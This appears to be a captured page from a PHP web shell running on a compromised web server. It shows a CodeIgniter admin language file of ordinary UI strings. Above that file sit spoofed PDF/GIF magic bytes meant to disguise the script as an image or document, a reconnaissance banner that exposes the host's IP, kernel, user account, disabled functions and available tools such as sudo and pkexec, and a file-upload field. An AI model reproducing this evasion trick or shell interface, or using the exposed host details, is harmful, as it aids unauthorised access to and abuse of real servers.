%PDF-1.7 GIF89;
Server IP : 5.161.254.237 / Your IP : 216.73.216.93 Web Server : Apache System : Linux diamond.sialwebvps.com 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64 User : stellasp ( 1131) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/stellasp/public_html/application/language/english/ |
Upload File : |
<?php /****************************************** US English Admin Page Language ******************************************/ $lang['link_information'] = 'Link Information'; $lang['add_new_page'] = 'Add New Page'; $lang['add_new_link'] = 'Add New Link'; $lang['pages'] = 'Pages'; $lang['attributes'] = 'Attributes'; $lang['seo'] = 'SEO'; $lang['page_form'] = 'Page Form'; $lang['link_form'] = 'Link Form'; $lang['title'] = 'Title'; $lang['url'] = 'URL'; $lang['url_example'] = 'ex. HTTP://www.google.com <strong>(http:// is required!)</strong>'; $lang['menu_title'] = 'Menu Title'; $lang['slug'] = 'Slug'; $lang['seo_title'] = 'SEO Title'; $lang['meta'] = 'Meta Data'; $lang['sequence'] = 'Sequence'; $lang['parent_id'] = 'Parent'; $lang['new_window'] = 'New Window'; $lang['open_in_new_window'] = 'Open this link in a new window'; $lang['content'] = 'Content'; $lang['top_level'] = 'Top Level'; $lang['follow_link'] = 'Follow Link'; $lang['go_to_page'] = 'Go to Page'; $lang['no_pages_or_links'] = 'There are currently no pages or links.'; $lang['error_page_not_found'] = 'The request page could not be found.'; $lang['error_link_not_found'] = 'The request link could not be found.'; $lang['message_saved_page'] = 'The page has been saved.'; $lang['message_saved_link'] = 'The link has been saved.'; $lang['message_deleted_page'] = 'The page has been deleted.'; $lang['message_deleted_link'] = 'The link has been deleted.'; $lang['confirm_delete'] = 'Are you sure you want to delete this page/link?';